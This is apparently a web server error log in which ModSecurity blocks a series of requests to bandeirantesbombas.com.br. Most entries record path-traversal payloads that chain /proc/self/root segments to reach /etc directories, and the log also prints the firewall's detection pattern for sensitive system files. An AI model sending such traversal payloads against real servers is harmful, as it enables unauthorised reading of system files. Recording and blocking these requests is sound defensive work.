[Mon Mar 16 16:50:51.224425 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:40958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfGs_BxrYCr4hPDw_-awAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:52.581708 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:34842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfHLysWC90G-1nBrBYBgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:53.770922 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:34852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfHdSswJuvopo3lOhzNwAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:55.079110 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:34860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfH6TCbgAP5jq5TehA1QAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:55.079597 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.243.203:39014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfH6QpVkWug9HeOt9JwAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:50:56.395436 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:45426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfILABkC4fWIHEf8EHrgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:58.576370 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:34866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfIs_BxrYCr4hPDw_-bwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:59.947513 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:46532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfI1ajLEzk2WiQ-10nSAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:03.046092 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:46548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfJ9SswJuvopo3lOhzOwAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:51:03.335600 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.243.203:45440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfJ6TCbgAP5jq5TehA2wAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:04.371441 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:46556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfKKQpVkWug9HeOt9JwgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:06.780997 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:46572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfKqQpVkWug9HeOt9JxAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:51:10.311106 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.243.203:52684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfLkr9dMAiw-8KANNbRwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:51:10.507475 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.241.46:46774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfLs_BxrYCr4hPDw_-dQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:51:14.067408 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:46790] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfMlajLEzk2WiQ-10nTgAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:51:24.699596 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.228.16:40486] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhfPP9ocpUE4ed4uDwG9AAAAhg"]
[Mon Mar 16 16:51:29.984953 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:34036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfQf9ocpUE4ed4uDwG_wAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:51:32.423641 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:36196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfRKQpVkWug9HeOt9J0wAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:36.671011 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:46806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfSI6lpbStxTqkSkt-6AAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:38.014595 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:52116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfSrysWC90G-1nBrBYHAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:51:38.227766 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:36206] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfSrABkC4fWIHEf8EHyAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:42.947692 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.243.203:36212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfTqQpVkWug9HeOt9J2wAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
